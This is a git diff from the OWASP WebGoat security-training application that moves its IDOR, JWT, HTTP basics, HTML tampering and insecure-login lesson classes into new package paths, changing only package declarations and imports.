rename from webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat/html_tampering/HtmlTamperingTask.java
rename to src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTamperingTask.java
index 4f4a04f56..f552458ed 100644
--- a/webgoat-lessons/html-tampering/src/main/java/org/owasp/webgoat/html_tampering/HtmlTamperingTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/html_tampering/HtmlTamperingTask.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.html_tampering;
+package org.owasp.webgoat.lessons.html_tampering;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasics.java b/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasics.java
similarity index 90%
rename from webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasics.java
rename to src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasics.java
index 37d98c08c..6fa81d761 100644
--- a/webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasics.java
+++ b/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasics.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.http_basics;
+package org.owasp.webgoat.lessons.http_basics;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 @Component
diff --git a/webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasicsLesson.java b/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsLesson.java
similarity index 88%
rename from webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasicsLesson.java
rename to src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsLesson.java
index 589636325..8906ddb41 100644
--- a/webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasicsLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsLesson.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.http_basics;
+package org.owasp.webgoat.lessons.http_basics;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasicsQuiz.java b/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsQuiz.java
similarity index 87%
rename from webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasicsQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsQuiz.java
index 8c9977fc2..5fea07748 100644
--- a/webgoat-lessons/http-basics/src/main/java/org/owasp/webgoat/http_basics/HttpBasicsQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/http_basics/HttpBasicsQuiz.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.http_basics;
+package org.owasp.webgoat.lessons.http_basics;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AssignmentPath;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AssignmentPath;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat/http_proxies/HttpBasicsInterceptRequest.java b/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequest.java
similarity index 93%
rename from webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat/http_proxies/HttpBasicsInterceptRequest.java
rename to src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequest.java
index d6c8f0206..aac759c27 100644
--- a/webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat/http_proxies/HttpBasicsInterceptRequest.java
+++ b/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequest.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.http_proxies;
+package org.owasp.webgoat.lessons.http_proxies;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.HttpMethod;
 import org.springframework.web.bind.annotation.RequestHeader;
 import org.springframework.web.bind.annotation.RequestMapping;
diff --git a/webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat/http_proxies/HttpProxies.java b/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpProxies.java
similarity index 91%
rename from webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat/http_proxies/HttpProxies.java
rename to src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpProxies.java
index a8926bf30..b0f9e31cb 100644
--- a/webgoat-lessons/http-proxies/src/main/java/org/owasp/webgoat/http_proxies/HttpProxies.java
+++ b/src/main/java/org/owasp/webgoat/lessons/http_proxies/HttpProxies.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.http_proxies;
+package org.owasp.webgoat.lessons.http_proxies;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDOR.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
similarity index 91%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDOR.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
index a7a3e02e7..5672067aa 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDOR.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDOR.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORDiffAttributes.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java
similarity index 90%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORDiffAttributes.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java
index d1d6d26c4..0b0dcca3d 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORDiffAttributes.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORDiffAttributes.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDOREditOtherProfiile.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java
similarity index 94%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDOREditOtherProfiile.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java
index ee00894ab..d142c5ec9 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDOREditOtherProfiile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDOREditOtherProfiile.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PathVariable;
 import org.springframework.web.bind.annotation.PutMapping;
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORLogin.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java
similarity index 91%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORLogin.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java
index 813b16e87..89e3b139d 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORLogin.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOtherProfile.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java
similarity index 91%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOtherProfile.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java
index d409ad26e..1710655fd 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOtherProfile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOtherProfile.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PathVariable;
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOwnProfile.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java
similarity index 96%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOwnProfile.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java
index 6eedf0024..c4a4f0e9d 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOwnProfile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfile.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
 
 import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOwnProfileAltUrl.java b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java
similarity index 90%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOwnProfileAltUrl.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java
index 0501a6c14..38a8ba5f0 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/IDORViewOwnProfileAltUrl.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/IDORViewOwnProfileAltUrl.java
@@ -20,13 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.session.UserSessionData;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.UserSessionData;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/UserProfile.java b/src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java
similarity index 98%
rename from webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/UserProfile.java
rename to src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java
index bddde8c29..569119fcf 100644
--- a/webgoat-lessons/idor/src/main/java/org/owasp/webgoat/idor/UserProfile.java
+++ b/src/main/java/org/owasp/webgoat/lessons/idor/UserProfile.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.idor;
+package org.owasp.webgoat.lessons.idor;
 
 import java.util.HashMap;
 import java.util.Map;
diff --git a/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLogin.java b/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
similarity index 91%
rename from webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLogin.java
rename to src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
index 2d6acdb9b..ec8a29c58 100644
--- a/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLogin.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLogin.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.insecure_login;
+package org.owasp.webgoat.lessons.insecure_login;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java b/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLoginTask.java
similarity index 90%
rename from webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java
rename to src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLoginTask.java
index 2e9b7a26d..d14f565c7 100644
--- a/webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat/insecure_login/InsecureLoginTask.java
+++ b/src/main/java/org/owasp/webgoat/lessons/insecure_login/InsecureLoginTask.java
@@ -20,15 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.insecure_login;
+package org.owasp.webgoat.lessons.insecure_login;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.HttpStatus;
 import org.springframework.web.bind.annotation.*;
 
-import java.util.Map;
-
 @RestController
 public class InsecureLoginTask extends AssignmentEndpoint {
 
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWT.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
similarity index 90%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWT.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
index bc2100b61..31a84a4ad 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWT.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWT.java
@@ -20,10 +20,10 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
-import org.owasp.webgoat.lessons.Category;
-import org.owasp.webgoat.lessons.Lesson;
+import org.owasp.webgoat.container.lessons.Category;
+import org.owasp.webgoat.container.lessons.Lesson;
 import org.springframework.stereotype.Component;
 
 /**
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTDecodeEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java
similarity index 78%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTDecodeEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java
index 63815d87a..0d2f06c6f 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTDecodeEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpoint.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTFinalEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java
similarity index 93%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTFinalEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java
index 1e1ffdec5..67d2a87b9 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTFinalEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpoint.java
@@ -20,15 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.*;
 import io.jsonwebtoken.impl.TextCodec;
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.*;
 
 import java.sql.ResultSet;
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java
similarity index 89%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java
index 0eebc255b..26f544cd4 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTQuiz.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTQuiz.java
@@ -1,7 +1,7 @@
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestParam;
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTRefreshEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java
similarity index 96%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTRefreshEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java
index 27ea4c610..675dcd449 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTRefreshEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpoint.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.ExpiredJwtException;
@@ -29,9 +29,9 @@ import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.JwtException;
 import io.jsonwebtoken.Jwts;
 import org.apache.commons.lang3.RandomStringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.MediaType;
 import org.springframework.http.ResponseEntity;
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java
similarity index 94%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java
index 259b9d4aa..affa09cf1 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpoint.java
@@ -20,16 +20,16 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.SignatureAlgorithm;
 import io.jsonwebtoken.impl.TextCodec;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTVotesEndpoint.java b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
similarity index 96%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTVotesEndpoint.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
index b4384c8b9..1c71a1e47 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTVotesEndpoint.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpoint.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.Jwt;
@@ -28,11 +28,11 @@ import io.jsonwebtoken.JwtException;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.impl.TextCodec;
 import org.apache.commons.lang3.StringUtils;
-import org.owasp.webgoat.assignments.AssignmentEndpoint;
-import org.owasp.webgoat.assignments.AssignmentHints;
-import org.owasp.webgoat.assignments.AttackResult;
-import org.owasp.webgoat.jwt.votes.Views;
-import org.owasp.webgoat.jwt.votes.Vote;
+import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.lessons.jwt.votes.Views;
+import org.owasp.webgoat.lessons.jwt.votes.Vote;
 import org.springframework.http.HttpStatus;
 import org.springframework.http.MediaType;
 import org.springframework.http.ResponseEntity;
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/votes/Views.java b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java
similarity index 78%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/votes/Views.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java
index bd71a99d1..ced070830 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/votes/Views.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Views.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.jwt.votes;
+package org.owasp.webgoat.lessons.jwt.votes;
 
 /**
  * @author nbaars
diff --git a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/votes/Vote.java b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java
similarity index 98%
rename from webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/votes/Vote.java
rename to src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java
index 3ec4bca7a..5e82bb362 100644
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/votes/Vote.java
+++ b/src/main/java/org/owasp/webgoat/lessons/jwt/votes/Vote.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt.votes;
+package org.owasp.webgoat.lessons.jwt.votes;
 
 import com.fasterxml.jackson.annotation.JsonView;
 import lombok.Getter;
@@ -69,4 +69,4 @@ public class Vote {
     private long calculateStars(int totalVotes) {
         return Math.round(((double) numberOfVotes / (double) totalVotes) * 4);
     }
-}
\ No newline at end of file
+}
